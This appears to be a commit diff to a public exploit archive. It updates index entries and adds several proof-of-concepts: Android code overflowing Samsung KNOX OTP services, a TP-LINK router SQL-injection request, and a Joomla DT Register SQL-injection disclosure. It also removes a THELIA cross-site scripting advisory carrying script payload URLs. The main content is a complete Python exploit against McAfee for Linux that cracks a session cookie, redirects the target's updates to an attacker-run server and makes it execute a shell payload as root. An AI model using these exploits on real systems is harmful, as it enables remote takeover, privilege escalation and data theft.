36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80
36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0
36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0
@ -35031,7 +35034,7 @@ id,file,description,date,author,platform,type,port
36979,platforms/php/webapps/36979.sh,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (2)",2015-05-11,"Claudio Viviani & F17.c0de",php,webapps,0
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2015-06-03,hyp3rlinx,php,webapps,0
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x - 'g' Parameter Cross-Site Scripting",2012-03-21,"Ayoub Aboukir",java,webapps,0
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0
36986,platforms/php/webapps/36986.txt,"Pluck CMS 4.7 - Directory Traversal",2015-05-11,Wadeek,php,webapps,0
36987,platforms/hardware/webapps/36987.pl,"D-Link DSL-500B Gen 2 - (Parental Control Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0
36988,platforms/hardware/webapps/36988.pl,"D-Link DSL-500B Gen 2 - (URL Filter Configuration Panel) Persistent Cross-Site Scripting",2015-05-11,"XLabs Security",hardware,webapps,0
36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injections",2015-05-11,"Filippo Roncari",php,webapps,0
@ -35575,7 +35578,7 @@ id,file,description,date,author,platform,type,port
37789,platforms/php/webapps/37789.txt,"OpenFiler 2.3 - Multiple Cross-Site Scripting / Information Disclosure Vulnerabilities",2012-09-06,"Brendan Coles",php,webapps,0
37790,platforms/php/webapps/37790.txt,"FBDj - 'id' Parameter SQL Injection",2012-09-11,"TUNISIAN CYBER",php,webapps,0
37791,platforms/multiple/webapps/37791.txt,"Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting",2012-09-12,"D. Niedermaier",multiple,webapps,0
37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - cat2.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
37940,platforms/php/webapps/37940.txt,"SenseSites CommonSense CMS - 'id' Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
37941,platforms/php/webapps/37941.txt,"SenseSites CommonSense CMS - special.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
37942,platforms/php/webapps/37942.txt,"SenseSites CommonSense CMS - article.php id Parameter SQL Injection",2012-01-06,"H4ckCity Security Team",php,webapps,0
37943,platforms/php/webapps/37943.txt,"WebTitan - 'logs-x.php' Directory Traversal",2012-10-20,"Richard Conner",php,webapps,0
@ -36356,12 +36359,12 @@ id,file,description,date,author,platform,type,port
39344,platforms/php/webapps/39344.txt,"ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39345,platforms/php/webapps/39345.txt,"ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39346,platforms/php/webapps/39346.txt,"ol-commerce - /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39347,platforms/php/webapps/39347.txt,"Fonality trixbox - /maint/modules/endpointcfg/endpoint_generic.php mac Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39348,platforms/php/webapps/39348.txt,"Fonality trixbox - /maint/modules/home/index.php lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39349,platforms/php/webapps/39349.txt,"Fonality trixbox - '/maint/modules/asterisk_info/asterisk_info.php' lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39350,platforms/php/webapps/39350.txt,"Fonality trixbox - /maint/modules/repo/repo.php lang Parameter Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39351,platforms/php/webapps/39351.txt,"Fonality trixbox - '/maint/modules/endpointcfg/endpointcfg.php' lang Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39352,platforms/php/webapps/39352.txt,"Fonality trixbox - /var/www/html/maint/modules/home/index.php lang Parameter Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39347,platforms/php/webapps/39347.txt,"Fonality trixbox - 'endpoint_generic.php' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39348,platforms/php/webapps/39348.txt,"Fonality trixbox - 'index.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39349,platforms/php/webapps/39349.txt,"Fonality trixbox - 'asterisk_info.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39350,platforms/php/webapps/39350.txt,"Fonality trixbox - 'repo.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39351,platforms/php/webapps/39351.txt,"Fonality trixbox - 'endpointcfg.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39352,platforms/php/webapps/39352.txt,"Fonality trixbox - 'index.php' Remote Code Execution",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0
39354,platforms/php/webapps/39354.pl,"Ramui Forum Script 9.0 - SQL Injection",2016-01-28,bd0rk,php,webapps,80
39355,platforms/php/webapps/39355.txt,"Ramui Web Hosting Directory Script 4.0 - Remote File Inclusion",2016-01-28,bd0rk,php,webapps,80
39356,platforms/hardware/webapps/39356.py,"Netgear WNR1000v4 - Authentication Bypass",2016-01-28,"Daniel Haake",hardware,webapps,80
@ -36870,3 +36873,4 @@ id,file,description,date,author,platform,type,port
40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80
40912,platforms/php/webapps/40912.txt,"Joomla! Component DT Register - 'cat' SQL Injection",2016-12-13,"Elar Lang",php,webapps,80

Can't render this file because it is too large.

View file

@ -0,0 +1,64 @@
/**
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=935
As a part of the KNOX extensions available on Samsung devices, Samsung provides a new service which allows the generation of OTP tokens.
The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e). However, in order to allow easy communication between the Non-secure World (NWD) and the Secure-World (SW) trustlet, a new server has been created. This server, called "otp_server", publishes a binder service called "OTP".
The service provides a single command via binder (command code 2), which allows a client to provide a buffer from the NWD to be sent to the SW. The requests are serialized to the parcel as a 32-bit length field, followed by the actual request data.
However, "otp_server" does not validate the request length field at all, allowing an attacker to specify any value. This length field is then used in a "memcpy" call in order to copy the data from the parcel to an internal heap-allocated buffer.
On the device I'm working on (SM-G925V), the "OTP" service can be accessed from any user, and the "otp_server" process runs with UID system and context "u:r:otp_server:s0".
I've attached a small PoC which can be used to trigger the overflow. Running it should crash "otp_server".
*/
package com.example.laginimaineb.otp;
import android.os.IBinder;
import android.os.Parcel;
import android.os.RemoteException;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.util.Log;
public class MainActivity extends AppCompatActivity {
/**
* The logtag used.
*/
private static final String LOGTAG = "OTP_TEST";
/**
* The name of the OTP binder service.
*/
private static final String INTERFACE_DESCRIPTOR = "OTP";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
try {
//Getting the binder
Class smClass = Class.forName("android.os.ServiceManager");
IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR);
//Creating a connection
Parcel parcel = Parcel.obtain();
Parcel reply = Parcel.obtain();
parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR);
int length = 0xFFFF;
parcel.writeInt(length); //Buffer length
for (int i = 0; i < length/4 + 1; i++)
parcel.writeInt(0xABABABAB);
binder.transact(2, parcel, reply, 0);
reply.recycle();
parcel.recycle();
} catch (RemoteException ex) {
Log.e(LOGTAG, "Failed to communicate with remote binder", ex);
}
}
}

View file

@ -0,0 +1,86 @@
/**
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=938
As a part of the KNOX extensions available on Samsung devices, Samsung provides a TrustZone trustlet which allows the generation of OTP tokens.
The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e), which can be communicated with using the "OTP" service, published by "otp_server".
Many of the internal commands supported by the trustlet must either unwrap or wrap a token. They do so by calling the functions "otp_unwrap" and "otp_wrap", correspondingly.
Both functions copy the internal token data to a local stack based buffer before attempting to wrap or unwrap it. However, this copy operation is performed using a length field supplied in the user's buffer (the length field's offset changes according to the calling code-path), which is not validated at all.
This means an attacker can supply a length field larger than the stack based buffer, causing the user-controlled token data to overflow the stack buffer. There is no stack cookie mitigation in MobiCore trustlets.
On the device I'm working on (SM-G925V), the "OTP" service can be accessed from any user, including from the SELinux context "untrusted_app". Successfully exploiting this vulnerability should allow a user to elevate privileges to the TrustZone TEE.
I've attached a small PoC which can be used to trigger the overflow. It calls the OTP_GENERATE_OTP command with a large length field which overflows the trustlet's stack. Running it should crash OTP trustlet.
*/
package com.example.laginimaineb.otp;
import android.os.IBinder;
import android.os.Parcel;
import android.os.RemoteException;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.util.Log;
public class OneWhoKNOX extends AppCompatActivity {
/**
* The logtag used.
*/
private static final String LOGTAG = "OTP_TEST";
/**
* The name of the OTP binder service.
*/
private static final String INTERFACE_DESCRIPTOR = "OTP";
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
try {
//Getting the binder
Class smClass = Class.forName("android.os.ServiceManager");
IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR);
//Writing a command with a large length field
Parcel parcel = Parcel.obtain();
Parcel reply = Parcel.obtain();
parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR);
byte[] command = new byte[0xDA7];
//Setting the command to OTP_GENERATE_OTP
command[0] = 0x02;
command[1] = 0x00;
command[2] = 0x00;
command[3] = 0x00;
//Setting the length field to something insane
command[0x41C] = (byte)0xFF;
command[0x41C + 1] = (byte)0xFF;
command[0x41C + 2] = (byte)0x00;
command[0x41C + 3] = (byte)0x00;
//Sending the command (should crash the trustlet)
parcel.writeByteArray(command);
binder.transact(2, parcel, reply, 0);
Log.e(LOGTAG, "res=" + reply.readInt());
reply.recycle();
parcel.recycle();
} catch (ClassNotFoundException |
NoSuchMethodException |
IllegalAccessException |
InvocationTargetException ex) {
Log.e(LOGTAG, "Failed to dynamically load ServiceManager methods", ex);
}
} catch (RemoteException ex) {
Log.e(LOGTAG, "Failed to communicate with remote binder", ex);
}
}
}

View file

@ -0,0 +1,39 @@
# Exploit Title: TP-LINK TD-W8151N - Denial of Service
# Date: 2016-12-13
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM
# Home : http://persian-team.ir/
# Tested on: Windows AND Linux
# Demo : https://www.youtube.com/watch?v=WrGgHvhiCGg
POC :
flagFresh Parameter Vulnerable
POST /Forms/status_1 HTTP/1.1
Host: 192.168.1.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.1.1/status.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Cookie: sessionid=13df8bc9; Language=en; C0=%00; C1=%00
flagFresh=0
Request :
POST /Forms/status_1 HTTP/1.1
Host: 192.168.1.1
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.1.1/status.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Cookie: sessionid=13df8bc9; Language=en; C0=%00; C1=%00
flagFresh=0&1 and benchmark(20000000%2csha1(1))--=1

289
platforms/linux/remote/40911.py Executable file
View file

@ -0,0 +1,289 @@
'''
Source: https://nation.state.actor/mcafee.html
Vulnerabilities
CVE-2016-8016: Remote Unauthenticated File Existence Test
CVE-2016-8017: Remote Unauthenticated File Read (with Constraints)
CVE-2016-8018: No Cross-Site Request Forgery Tokens
CVE-2016-8019: Cross Site Scripting
CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation
CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location
CVE-2016-8022: Remote Use of Authentication Tokens
CVE-2016-8023: Brute Force Authentication Tokens
CVE-2016-8024: HTTP Response Splitting
CVE-2016-8025: Authenticated SQL Injection
When chaned together, these vulnerabilities allow a remote attacker to execute code as root.
'''
#!/bin/python3
import time
import requests
import os
import sys
import re
import threading
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
# Per-target configuration
target_domain="https://10.0.1.130" # https://target_ip
local_ip = '10.0.1.128' # Attacker IP for victim to connect back to
authorized_ip="127.0.0.1" # IP address cookie will be valid for
update_server_port = 8080 # Port update server listens on
delay_seconds = 10 # How long should the server take to serve the update
target_port = 55443 # Port to target
# Put payload script in payload.sh
# Initialization
payload_in_place = threading.Event()
requests.packages.urllib3.disable_warnings()
with open("payload.sh", "r") as f:
payload = f.read()
def pprint(inp, flag=False):
pad = "#"
if flag:
pad = "*"
print("\n" + pad+ " " + inp)
def crack_cookie():
pprint("Cracking Cookie")
# A page that requires authentication
url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=productUpdate.html"
# Start at the current time + 100 in case of recent login with clock skew
date_val = int(time.time()+100)
cookie_fmt = authorized_ip+"/n/0/%d-checksum// "+authorized_ip + " "*20
# Make requests, print after every 600
while True:
cookie = cookie_fmt % date_val
req_cookie = {"nailsSessionId": cookie}
r = requests.get(url, cookies=req_cookie, verify=False)
r.raise_for_status()
if "Set-Cookie" in r.headers:
valid_cookie = cookie
timestamp = cookie.split("/")[3].split("-")[0]
break
elif date_val % 600 == 0:
print("Now trying %s" % time.asctime(time.localtime(date_val)))
date_val -= 1
pprint("Cookie Cracked: " + timestamp, True)
return valid_cookie
def update_update_server(auth_cookie):
pprint("Updating update server")
# Replace McAfeeHttp update server with attacker local_ip:update_server_port
url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=" \
"repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F" \
"xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists" \
"%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25" \
"3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2" \
"520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na" \
"me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee" \
"Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522"+local_ip+"%253A"+str(update_server_port) \
+ "%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%" \
"253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220" \
"%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe" \
"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221" \
"%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU" \
"seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr" \
"ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%" \
"2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select" \
"+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re" \
"posProperty=fallback&useOfProxy=on"
r = requests.get(url, cookies=auth_cookie, verify=False)
r.raise_for_status()
pprint("Updated update server", True)
def download_update(req_cookie):
pprint("Requesting target download payload")
# Send request to make target download payload
url = target_domain + ":" + str(target_port) + "/0409/nails"
updateName = "update_%d" % int(time.time())
postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab" \
"le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%" \
"3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D" \
"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh" \
"ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+" \
"_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in" \
"fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc" \
"%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2" \
"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask""").format(updateName)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
r.raise_for_status()
pprint("Payload download requested", 1)
def exec_catalogz(req_cookie):
pprint("Making target execute payload")
#### Get commit_id and ODS_name
url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0" \
".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf" \
"o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O" \
"DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi" \
",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu" \
"lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction"
r = requests.get(url, cookies=req_cookie, verify=False)
r.raise_for_status()
regex = re.search("\|digest=(.+?)\|", r.text)
if not regex:
print("\nERROR: Could not get commit_id when generating evil scan\n")
return False
commit_id = regex.groups(1)[0]
# Send request to start evil scan
payload_path = "%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z"
binary_path = "%2Fbin%2Fsh" # Use "%2fbin%2Fstatic-sh" for versions 1.x
url = target_domain + ":" + str(target_port) + "/0409/nails"
ODS_name = "ODS_1" # This may need to be increased if the name already exists
scan_name = "scan_%s" % str(int(time.time()))
postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=" \
"multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof" \
"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child" \
"InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd" \
".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3" \
"Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi" \
"eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI" \
"nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na" \
"ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+" \
"nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar" \
"antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1" \
"}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3" \
"00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s" \
"canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild" \
"%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na" \
"ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{" \
"1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}" \
".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e" \
"xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act" \
"ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}" \
".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti" \
"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+" \
"taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl" \
"e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D" \
"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+" \
"_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro" \
"gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs" \
"et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult" \
"i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9" \
"=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11" \
"=pageNo&echo%3A12=&info%3A12=selectedTask").format(commit_id, ODS_name, scan_name,payload_path, binary_path)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
r.raise_for_status()
pprint("Payload executed", 1)
def start_update_server():
class RequestHandler(BaseHTTPRequestHandler):
def do_HEAD(s):
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
if s.path == "/catalog.z":
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(payload, "utf-8"))
pprint("Payload placed", 1)
payload_in_place.set()
# Die after sending payload so we send an incomplete response
raise KillServer
else: # Assume all other requests are for SiteStat - Always increasing version
s.send_response(200)
s.send_header("Content-type", "text/xml")
s.end_headers()
s.wfile.write(bytes(("""<?xml version="1.0" encoding="UTF-8"?>""" \
"""<SiteStatus Status="Enabled" CatalogVersion="2%d">""" \
""" </SiteStatus>""") % int(time.time()), "utf-8"))
# Throwing KillServer will shutdown the server ungracefully
class KillServer(Exception):
def __str__(self):
return "Kill Server (not an error)"
# ThreadingMixIn plus support for KillServer exceptions
class AbortableThreadingMixIn(ThreadingMixIn):
def process_request_thread(self, request, client_address):
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except KillServer:
pprint("Killing update server dirtily")
self.shutdown_request(request)
self.shutdown() # Only if we want to shutdown
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):
pass
pprint("Launching update server")
srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)
threading.Thread(target=srv.serve_forever).start()
pprint("Update server started", 1)
return srv
####################################################################################
####################################################################################
pprint("Attacking %s" % target_domain, 1)
# Crack the auth cookie
cookie = crack_cookie()
auth_cookie = {"nailsSessionId": cookie}
# Start our update server locally
srv = start_update_server()
# Force target to use our update server
update_update_server(auth_cookie)
# Make target download an update from us
download_update(auth_cookie)
# Block until the target downloads our payload,
payload_in_place.wait()
# Shutdown our update server
srv.shutdown()
# Execute /bin/sh -(?) catalog.z
exec_catalogz(auth_cookie)

View file

@ -1,12 +0,0 @@
source: http://www.securityfocus.com/bid/37855/info
THELIA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The issues affect THELIA 1.4.2.1; other versions may also be affected.
http://www.example.com/panier.php?action=ajouter&ref=">
http://www.example.com/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1
http://www.example.com/rss.php?ref=">&id_rubrique=

99
platforms/php/webapps/40912.txt Executable file
View file

@ -0,0 +1,99 @@
Title: SQL injection in Joomla extension DT Register
Credit: Elar Lang / https://security.elarlang.eu
Vulnerability: SQL injection
Vulnerable version: before 3.1.12 (Joomla 3.x) / 2.8.18 (Joomla 2.5)
CVE: pending
Full Disclosure URL: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
Vendor: DTH Development
Vendor URL: http://www.dthdevelopment.com/
Product: DT Register "Calendar & Event Registration"
Product URL: https://extensions.joomla.org/extension/dt-register
Product URL: http://www.dthdevelopment.com/joomla-components/dt-register-event-registration-for-joomla.html
# Background
"DT Register is the Joomla Event Registration component that gives you
functionality beyond what any other event booking solution can offer"
(https://extensions.joomla.org/extension/dt-register)
# Vulnerability
SQL injection in Joomla extension "DT Register" by DTH Development
allows remote unauthenticated attacker to execute arbitrary SQL
commands via the cat parameter.
# Preconditions
No pre-conditions for authentication or authorization.
# Proof-of-Concept
http://[DOMAIN]/[PATH]/index.php?controller=calendar&format=raw&cat[0]=SQLi&task=events
PoC value (shows out all events / it's possible to see valid eventId values):
cat[0]=6) OR 1-- -
## Using UNION
For reading the data out using UNION it's important to have and to
know one valid eventId (detected in previous step).
In total there are 112 fields in select query, eventId position is no
13. For output is best to use position 112.
Step-by-Step - how to read the data out is available in blog:
https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
# Vulnerability Disclosure Timeline
Full communication is available in blog:
https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
2016-10-17 | me > DTH | via web form - I would like to report some
security holes. What is the correct way for that?
2016-10-18 | me > DTH | any response?
2016-10-25 | me > DTH | mail to dthdev@dthdevelopment.com
2016-10-25 | DTH > me |
* "you are not in our client list"
* "Our site (dthdevelopment.com) is protected by an enterprise grade firewall"
2016-10-25 | me > DTH | I'm whitehat, technical details
2016-10-25 | DTH > me | description, what kind of serious problems I may face
2016-10-25 | me > DTH | explanations
2016-11-02 | me > DTH | hello?
2016-11-11 | me > DTH, SiteLock | Last call.
2016-11-11 | SiteLock / DTH / me | some communication
2016-11-12 | DTH > SiteLock (CC to me) | "It was configured to be open
in the setup"
2016-11-15 | DTH | Released DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5)
2016-12-05 | DTH > me | "Sorry, forgot to respont on this. We closed
the problem on our demo site".
2016-12-12 | me | Full Disclosure on security.elarlang.eu
2016-12-13 | me | Full Disclosure on FullDisclosure mailinglist on seclists.org
## asking CVE from DWF (Distributed Weakness Filing Project) /
http://iwantacve.org
2016-10-20 | me > DWF | CVE request
2016-10-31 | DWF > me | "CVE - Acceptance of MITRE Terms of Use for
CVE Assignment"
2016-10-31 | me > DWF | I accept
2016-11-19 | me > DWF | Any feedback or decision? (still no response)
2016-12-11 | me > DWF | Is there any hope to get feedback? (still no response)
